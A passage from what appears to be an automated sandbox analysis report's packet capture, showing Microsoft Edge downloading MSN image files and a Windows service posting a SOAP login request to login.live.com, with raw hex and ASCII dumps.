                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC8048INData Raw: 96 07 b1 09 7d 5c 09 31 b2 e8 4a 57 93 40 ed 11 b5 37 eb 04 c6 d6 d3 92 8c 5b 89 46 ca 65 c8 f4 b7 8a c9 27 8a 71 10 a0 ea c7 9a d5 6f 0a 51 ff 00 18 24 b0 ad 08 7d c4 62 26 06 92 b7 7f 8c 39 a9 8c a2 d6 e4 16 c4 81 be e7 03 21 9c 39 d9 6b 33 86 27 30 de df b8 53 24 37 10 7c 02 92 1a 5d 12 01 07 af c5 4e 67 3b 93 64 aa 5c 3b 00 c2 fc ee a4 8e 1b 70 23 94 fd d4 56 b0 53 3e 57 78 6a f7 15 38 39 ff 00 d5 dc 50 c9 a2 75 3a 2c 61 fc 53 6a 54 00 40 06 16 77 a8 70 3d e3 f3 51 9f 51 f9 69 77 20 52 c3 9e f3 25 ed 13 fd 49 c3 4b b9 14 6d 2c 9b b0 82 b1 f5 82 7c ec 2c 3b ad 2a 63 9c a4 67 9f bf 6c da 63 69 9f 64 90 7a d9 4b 92 30 2b 24 3e 02 66 af 04 3a 11 ad eb 98 b9 ed 50 cf 9b de a2 92 14 52 f1 bd d3 a2 ba 93 0c 8c 14 77 1a 87 00 0f 22 96 1c 7f a8 f2 4c 68 d5 99
                                                                                                                                                                                                                                                                                                                    Data Ascii: }\1JW@7[Fe'qoQ$}b&9!9k3'0S$7|]Ng;d\;p#VS>Wxj89Pu:,aSjT@wp=QQiw R%IKm,|,;*cglcidzK0+$>f:PRw"Lh


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    116192.168.2.749901104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC634OUTGET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC519INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msOP1
                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 21 Nov 2024 14:18:51 GMT
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 93971
                                                                                                                                                                                                                                                                                                                    X-Datacenter: eastus
                                                                                                                                                                                                                                                                                                                    X-ActivityId: 018f338c-4aa5-4903-85a0-d96bc95803ac
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Length: 93971
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=324761
                                                                                                                                                                                                                                                                                                                    Expires: Sun, 01 Dec 2024 02:19:34 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:53 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC15865INData Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02
                                                                                                                                                                                                                                                                                                                    Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC16384INData Raw: e6 a4 36 cb df b3 ba c7 b3 04 ed 90 f6 e2 c2 e6 e2 15 12 1c 08 23 50 44 21 50 5e 9a f9 a6 e1 58 88 88 04 75 48 8b 6b 98 b4 55 49 21 35 87 dd 35 26 9a 44 0e 7e 35 49 54 56 24 0a c4 e4 3a d3 25 88 82 73 12 46 2c 8f 29 d5 48 5d 8d c6 6d ee 35 cf db 1b cd 13 3b 65 ce 68 24 82 2e d8 34 30 69 78 42 73 cb ea e3 26 05 79 08 4a a2 ca 49 52 35 6d 63 cb 5c f6 87 76 43 9c 40 9c 23 10 01 c4 8f c4 49 02 4e 65 45 b3 aa 23 1d 30 c2 ef d6 d3 47 11 31 13 3d c0 55 c0 10 0c 29 02 b4 c1 ad 79 db 8a aa 65 6e a9 71 fa 29 25 31 ae 97 e2 b4 2c 69 c5 4d 28 96 43 62 66 0e 29 81 59 31 87 5a 6b 9a bc 6c 6b dc 58 de d3 88 37 17 71 6e 2b 56 04 90 3a 20 95 58 4e 0c 52 db c4 4f 75 a6 70 e9 d5 4b 52 aa 41 6c 45 6f 3e 54 f9 a5 34 8f 1c b8 26 d6 cd c8 02 b5 e4 26 38 d8 2d 03 88 ad 46 87 29
                                                                                                                                                                                                                                                                                                                    Data Ascii: 6#PD!P^XuHkUI!55&D~5ITV$:%sF,)H]m5;eh$.40ixBs&yJIR5mc\vC@#INeE#0G1=U)yenq)%1,iM(Cbf)Y1ZklkX7qn+V: XNROupKRAlEo>T4&&8-F)
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC2690INData Raw: 83 cc 99 ce ca d2 0c 19 c8 45 ea b3 1d 04 82 d0 6b 50 e2 40 a7 28 77 ba a9 07 3a 4d 94 43 71 18 32 64 d6 b0 78 ac a2 c5 12 20 1e a2 6e d3 71 06 2b 65 9d 79 10 66 b4 f4 e1 6e aa 84 dc 52 d6 14 06 66 2a 6b aa 89 fc a6 bc bd 62 2b d5 05 65 d2 1c 5c 6f d2 f5 d3 45 0d 70 26 b4 eb 68 eb 62 86 58 e8 2e 83 84 10 31 65 26 48 f3 85 27 aa 0b b8 38 bc d2 4b 9c 60 61 10 0f 5b cc 92 2b ce 55 07 46 d9 93 6b 0b c9 b5 81 a4 0e 0b 9b 6c 12 1d 04 d8 d2 40 91 a7 59 d0 23 34 c0 6e 29 70 ac b6 63 3b 50 cd 4f ba 63 2a 21 bb 8e 26 03 45 04 34 90 db 6a e2 7f 95 b0 06 48 37 b4 52 63 50 7a 84 f0 b9 ae 20 c1 ce 41 11 c2 25 ab 0d a9 ac cd a8 01 12 33 e5 09 d3 3c 41 70 b4 35 bd d8 84 d6 86 87 4e a9 b8 b3 07 6f 6b ad 84 09 10 3f d4 4c c9 e8 2b a8 45 a3 59 63 06 7b 64 1f 5a 8f 9a 0e 17
                                                                                                                                                                                                                                                                                                                    Data Ascii: EkP@(w:MCq2dx nq+eyfnRf*kb+e\oEp&hbX.1e&H'8K`a[+UFkl@Y#4n)pc;POc*!&E4jH7RcPz A%3<Ap5Nok?L+EYc{dZ
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC16384INData Raw: 14 b8 0f 4e b9 ab 76 28 e7 5a 6b c3 35 0e 0e 1e 95 f4 52 11 c4 48 87 54 92 0d 22 04 d2 49 92 ea 6b a4 28 34 a4 9b da 0f 9f 14 da 70 65 5c f2 a7 8a a4 23 43 32 22 b9 29 63 12 08 10 39 ce a7 4d 07 45 a2 97 32 3c 80 5a 3a 52 4c 4e 7c 8d 13 ec ac 12 22 22 73 f2 b4 75 41 49 34 98 a7 01 3c d1 71 54 b9 b2 09 6f 68 69 23 0d 73 24 54 08 88 9e b2 82 40 8b cf 0f 4b d3 ad 16 98 3d 3a 28 c8 21 25 f5 2e a9 26 4e 66 6a 49 d7 8a ac 2e 74 40 8a c6 84 f9 88 f1 55 4e 3b 8e 2d 71 6b 41 c2 d0 dc 20 32 70 80 2a 03 44 bb fc 8e 66 b2 8b 1b 85 a1 a5 ce 2d 93 86 7f f9 60 dd f8 66 9a 12 42 8f a4 05 a0 07 f7 8e d1 42 29 31 9e 19 b1 d0 d5 63 d9 af 1b 1e 08 bb 90 21 87 00 0d c5 07 ba b5 26 fa 7f 8d 05 ea b1 3f a8 c9 6b 81 6e 17 00 40 23 15 08 c4 1c 2a 30 e5 10 79 27 d0 7a b9 27 92 c4
                                                                                                                                                                                                                                                                                                                    Data Ascii: Nv(Zk5RHT"Ik(4pe\#C2")c9ME2<Z:RLN|""suAI4<qTohi#s$T@K=:(!%.&NfjI.t@UN;-qkA 2p*Df-`fBB)1c!&?kn@#*0y'z'
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC16384INData Raw: 6e 23 e4 b3 a7 1c bb e0 35 97 19 e5 04 71 b9 5e 6c 02 bd 1d d2 37 43 87 22 29 02 f6 f1 2b 91 f4 02 84 00 63 f8 5d ba b9 77 3d a1 86 e0 44 1e 28 db 83 b4 13 e0 20 ec e3 dc 34 6b 9d 11 20 02 6e 60 4c 5a 49 03 9a 37 73 e8 05 8d be 55 95 a7 30 66 20 c1 13 6a 64 8a 48 36 d3 c1 49 c2 8d 65 00 04 9b 00 65 d9 4d c8 11 41 60 67 55 23 6e b1 6e b9 7a 14 b2 23 0c 9b 13 59 cf d1 10 1d 79 75 01 0e 1c c7 12 08 31 40 5a 69 cc 13 06 a8 ed 70 ac d4 47 23 d1 2c 90 dc 6b 36 b7 19 fa f6 df 8c 34 07 38 1c 6c 73 4c e2 61 11 18 aa 08 a8 21 03 0e be 0e 53 d1 74 5e 48 14 a5 6f 1f 75 0e 69 00 45 ef 33 79 e8 b5 19 04 cb 25 a0 83 20 13 4e 30 24 48 ea 85 4f ba 39 6f dc a4 fd bc 39 f7 66 0c 53 dd 68 39 cb 6f 33 e8 b0 ed 24 5e 69 5f e5 18 17 03 42 68 71 37 a3 86 7c d4 ba 93 20 e2 26 a4
                                                                                                                                                                                                                                                                                                                    Data Ascii: n#5q^l7C")+c]w=D( 4k n`LZI7sU0f jdH6IeeMA`gU#nnz#Yyu1@ZipG#,k648lsLa!St^HouiE3y% N0$HO9o9fSh9o3$^i_Bhq7| &
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC7952INData Raw: d6 1d 84 56 26 2d 9f 43 c5 71 b1 df af 67 60 dd 18 48 ac c5 26 3c 59 75 7e ce d0 24 44 45 6e 34 8e 2b ca 79 c8 b6 1d 63 34 f2 1e cb 35 f0 d1 39 5f 2e 0b 18 e9 a7 f1 0f 20 35 c0 c9 b1 5e 46 eb 85 e6 78 7b af 53 71 8e c2 c7 90 40 7b 65 a4 d9 e2 48 91 c4 47 35 e5 6e 06 c7 e3 06 69 5b 5e 64 75 a4 55 6b aa ed 41 80 74 27 82 1b 99 4a 9a e5 4a 55 13 08 26 45 00 3d 68 ba 4f c6 6f 1d cd a7 3b 03 ff 00 4e db b6 58 1c c0 47 eb 38 86 12 22 b1 8c 90 4d 41 88 b2 f4 75 cf 7b 8f 3f 79 7d a6 bc e7 35 b3 35 c3 94 c0 3f 78 cd 22 d1 48 33 23 2c ab 63 d5 14 ed 81 5a 9e a8 a3 6d a4 08 9b d4 88 a0 d2 33 56 8e 35 ca e6 80 75 f4 e0 8c 36 c5 d1 06 db 4c 56 01 35 c8 fd 0a 4e a4 0c 56 14 a4 1b 9b eb cd 1a dc 86 dc 46 18 26 b1 49 89 39 7a a2 3b 6f 03 a2 67 0d ce 40 f3 f6 e6 82 0f 5e
                                                                                                                                                                                                                                                                                                                    Data Ascii: V&-Cqg`H&<Yu~$DEn4+yc459_. 5^Fx{Sq@{eHG5ni[^duUkAt'JJU&E=hOo;NXG8"MAu{?y}55?x"H3#,cZm3V5u6LV5NVF&I9z;og@^
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC16384INData Raw: 4a 69 a7 9b 1c 49 22 aa 12 59 fc 9f 71 c7 52 92 a2 92 3f 23 53 a5 fa 06 54 22 15 25 1f 94 fe 30 8a 19 45 28 65 6a 7c ba 3f 10 45 0c a2 94 32 b5 f9 47 e3 0c a1 94 42 a4 a7 f2 2f c6 1a 85 65 49 57 33 c1 17 52 55 15 32 b5 c9 70 4a 94 ca 92 53 3b 2e 09 2a 4a 72 a0 94 f2 5c 18 a9 5a 54 ca 79 2e 0c 52 52 5c a4 b9 5a b8 a9 64 32 f5 1f b1 06 75 1d 35 cf fb 02 df b9 a3 31 e6 8b 2f d1 a9 8e 89 4a 57 2b be 25 82 b8 82 03 be 31 83 aa 27 c7 df b7 fa 68 e7 d2 7f aa 7e af 43 10 54 1c bc 7f f7 cc ea 91 f8 e7 64 d3 c5 6b fd bf c9 7d 99 fc df 1c f7 7b ed 2b b7 6d b8 97 c6 3f fe 53 75 8e 22 02 bd bf f9 1f 8c 73 27 f6 96 5f fd 3e 81 72 ef fc 07 cb db df ac ff 00 9f 66 ba ff 00 19 f1 cf 19 da be e8 ec 3a 26 0a f2 be 23 7b 6f 6c c1 7b 47 49 5f 29 bb f1 9f 13 b9 47 6f 3c d2 c5
                                                                                                                                                                                                                                                                                                                    Data Ascii: JiI"YqR?#ST"%0E(ej|?E2GB/eIW3RU2pJS;.*Jr\ZTy.RR\Zd2u51/JW+%1'h~CTdk}{+m?Su"s'_>rf:&#{ol{GI_)Go<
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC1928INData Raw: a9 57 45 92 24 d1 0e b3 4a 2d 88 05 25 c0 73 44 8d 89 10 b2 8f d8 0a c0 f3 e0 ac 1a b5 51 55 18 b4 13 ea b6 37 73 1e e1 04 48 5a 88 12 6a 26 46 99 a8 c5 4d 47 a2 78 8d 74 62 01 6c 7f c7 d1 73 cc 18 3a 66 94 f8 36 f3 57 11 c9 d1 fb 2d d7 87 d9 2c 67 c7 82 82 09 e1 d0 cf b2 d3 cb ff 00 84 ab 8a da 3e 3f 02 16 c4 7c 7d c2 0c f3 f5 09 ce 77 e5 43 e4 ac 5a 36 29 f1 f7 58 1c 8d 34 28 53 9c c8 d0 dd 69 cd b4 e8 8c 3a 34 cb ba 8c c2 41 d2 26 e7 c6 88 77 a8 be 89 82 0b a6 ca c5 aa 92 e1 4e 23 f9 5a 97 b7 9f c9 4c c1 ee 17 cd 31 39 43 86 8a c2 ae b1 3e 47 ee 98 75 32 3d 2a 14 52 68 4b 4e 99 27 7f c8 7f dc 14 96 5d 84 67 c8 d4 2c 6a d0 44 18 50 45 2f 88 7b ad 43 f8 d0 e8 84 bc 41 c2 26 12 26 90 e1 4d 42 52 0d 1c 23 aa d2 e6 8a 59 48 c4 da 8e 1d 52 06 3f c9 be 89 1c
                                                                                                                                                                                                                                                                                                                    Data Ascii: WE$J-%sDQU7sHZj&FMGxtbls:f6W-,g>?|}wCZ6)X4(Si:4A&wN#ZL19C>Gu2=*RhKN']g,jDPE/{CA&&MBR#YHR?


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    117192.168.2.749902104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC634OUTGET /tenant/amp/entityid/BB1msFQA.img HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC518INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 16 Sep 2024 13:47:16 GMT
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Datacenter: eastus
                                                                                                                                                                                                                                                                                                                    X-ActivityId: ff79e93a-9960-4b77-a778-af0a49b23005
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msFQA
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 67183
                                                                                                                                                                                                                                                                                                                    Content-Length: 67183
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=64258
                                                                                                                                                                                                                                                                                                                    Expires: Thu, 28 Nov 2024 01:57:51 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:53 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC15866INData Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02
                                                                                                                                                                                                                                                                                                                    Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC16384INData Raw: 5f 5b a3 b9 4e 4b 44 b6 25 ed b9 ea c3 8b fa b2 eb f0 8a 5d d8 7f 89 9f 01 1f a8 f1 90 dd 5e a7 3b bf cc f5 69 fd 77 8c 86 f7 19 ad 71 f7 58 e3 38 65 d6 32 eb 19 c4 76 fb b8 f1 dc 5f 2b 81 ab cc d3 f9 9d 2b 8e ab ff 00 e9 f1 1d 91 f7 9f 25 0f f8 89 f2 e8 df f6 65 ef 47 a3 1f f8 83 87 7d 68 54 8f 32 7e d3 8c e1 97 fe 5d 63 3c 7b 7b 6f 8e ad ff 00 e9 f1 1f e5 f7 87 df 78 9c b8 2a dc f2 82 f6 9c b1 fa cf 05 2f ee 5b bd 35 ec 3b a3 f5 0e 16 5b ab 43 fa 91 ce a7 ff 00 3f 9b 77 1d b9 5f 17 c7 be af 05 db 51 18 f9 df 56 93 c3 87 a3 1e f9 7f f9 1e da e2 29 cb 74 a2 fb 9a 35 f3 23 a4 5f a4 2f f2 f0 94 be ae f9 3c 3a e7 7e f3 b6 9a e3 ef eb fb bd b5 39 df e4 7a 3b 6b 49 5b 68 97 e9 05 2a d2 d2 3b 3d 24 6d 0f 68 c2 aa c3 b1 37 0b 90 55 86 4d ca b8 0c 04 30 18 c9 18
                                                                                                                                                                                                                                                                                                                    Data Ascii: _[NKD%]^;iwqX8e2v_++%eG}hT2~]c<{{ox*/[5;[C?w_QV)t5#_/<:~9z;kI[h*;=$mh7UM0
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC2357INData Raw: b7 b6 cc ca 6c cc ac 90 00 82 19 23 00 a0 43 11 00 00 05 00 08 40 30 10 ca c8 10 ee 22 d0 60 20 2a 18 80 45 4b 50 12 32 80 04 74 c6 94 e6 d5 90 1c e0 7b 74 f8 29 3c 5e af 8e 8d 27 ad 0e 16 9c 15 f7 ee df d3 e4 73 9c e1 bd 66 5f 2f 1a 53 96 47 a7 0e 06 4d bd ae 4d ae bf 1f 99 f4 f0 82 4d d9 62 96 36 cb bb 28 fc cc d6 29 46 1b 32 57 eb 3f cb 8f 8a 5f 69 eb 39 4e 73 2e b1 84 38 69 f0 74 e2 d5 f1 ba 78 e4 b4 24 b7 b6 f2 6f 2c 4f 42 9d 28 a5 18 da db 56 95 45 9b b6 4d f2 62 81 cf cc bf 96 fd 2a fb 55 e5 9e 1c 9b e5 95 fb 05 1f 54 56 cf a6 92 b4 a7 52 78 39 db 3c 79 37 ed ee 39 4c cb a4 44 43 aa 36 bc f3 7b 4e 4a 3b ba db 95 fa 59 09 3b 6c df 7a 84 dd 92 e5 4b d2 9b 5a 37 da e6 49 ed 47 6a 2f 62 9a 77 95 49 61 29 e3 8b 57 dd 7d 2f 17 90 ef 75 b5 1f d3 86 e7 39
                                                                                                                                                                                                                                                                                                                    Data Ascii: l#C@0"` *EKP2t{t)<^'sf_/SGMMMb6()F2W?_i9Ns.8itx$o,OB(VEMb*UTVRx9<y79LDC6{NJ;Y;lzKZ7IGj/bwIa)W}/u9
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC16384INData Raw: 46 92 5e b8 e0 9c e2 ad 15 94 13 f7 91 9c 94 5f a9 f5 ea 3c b5 2d 7a 16 45 02 7b 55 27 15 8e ce 12 96 57 b5 ed 7d 5a 37 20 be d5 da 76 8a c3 6b 4e a8 ea 1e ca d9 d8 58 41 6f c7 17 de f4 3c f3 65 66 be 1f 82 cb bd 90 43 c7 0b 59 78 3d b2 f7 0f 7b be 6b 3c 92 d5 ef 04 e2 e3 39 2e ac 2f 7e f5 be da 5e b0 83 52 8e db c2 36 ba bf cf 58 07 cb e3 2f c0 33 d2 f4 2d cb bd 82 bb bb dc de 9d fb 3a 5f 84 4d ab 39 3c 21 c9 59 c9 fb 6f 92 03 f0 90 15 c0 f6 9e 61 80 80 06 32 40 81 80 8a 28 92 80 08 18 08 44 43 28 43 34 10 00 c2 90 c6 20 86 31 01 14 c0 00 a0 24 60 19 05 08 02 98 08 61 00 80 00 63 01 80 80 62 0a 63 18 c0 45 00 04 21 81 40 2b 16 20 00 0d e1 6d 25 00 25 61 88 41 14 21 08 8a 40 00 4b 00 c4 22 34 77 10 86 40 87 71 5c 90 00 10 80 00 40 03 10 00 00 5c 42 2a 59
                                                                                                                                                                                                                                                                                                                    Data Ascii: F^_<-zE{U'W}Z7 vkNXAo<efCYx={k<9./~^R6X/3-:_M9<!Yoa2@(DC(C4 1$`acbcE!@+ m%%aA!@K"4w@q\@\B*Y
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC16192INData Raw: a5 4e 32 77 95 a5 36 b4 47 75 97 6d 88 34 fc b6 a7 3f 55 59 e1 15 fe 15 a9 66 c1 7e 8b 72 7e ba b5 3d 9b 96 a8 a2 14 b7 d5 92 bc 9e 10 8e 69 68 e7 de c7 7f 25 6d 4a d2 ab 3c 12 f6 6a 8a cd 91 52 d3 a3 4e 51 4f 6a ad 5b e3 ad e1 7c 37 46 2b 70 e4 9c 29 d3 a1 17 79 bb 2d ad 09 75 a5 ab f1 05 6a 11 da 9f aa a4 b0 d6 f4 28 ea e8 c2 17 a1 79 cb d5 56 6f 72 f9 2d 4b 32 8d 95 9d 92 fc b8 7f 9a 5e d0 57 72 db 6a ed 75 63 92 ef d6 73 45 79 11 d9 5e aa 95 1b 69 64 af f2 8c 4b 9b f2 20 a9 c3 d5 52 a5 f1 d7 9c 9f 70 1b 53 5b 5c 4c a4 f1 4a 29 5f c2 f3 8a f9 98 f0 df a9 56 bd 67 bd 4a 54 e3 fb 30 f7 bb 84 df dd a8 28 47 19 c9 6c c6 fb dc 9e 6f e6 c2 cf 86 e1 d5 38 63 52 4b 65 6b 6f 7c 9f cd 80 f8 59 79 b1 9d 48 e1 2a 8d ed 3f 0d b0 b7 37 cc ba 6d 4e 2e 30 c2 09 b4 df
                                                                                                                                                                                                                                                                                                                    Data Ascii: N2w6Gum4?UYf~r~=ih%mJ<jRNQOj[|7F+p)y-uj(yVor-K2^WrjucsEy^idK RpS[\LJ)_VgJT0(Glo8cRKeko|YyH*?7mN.0


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    118192.168.2.74989720.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
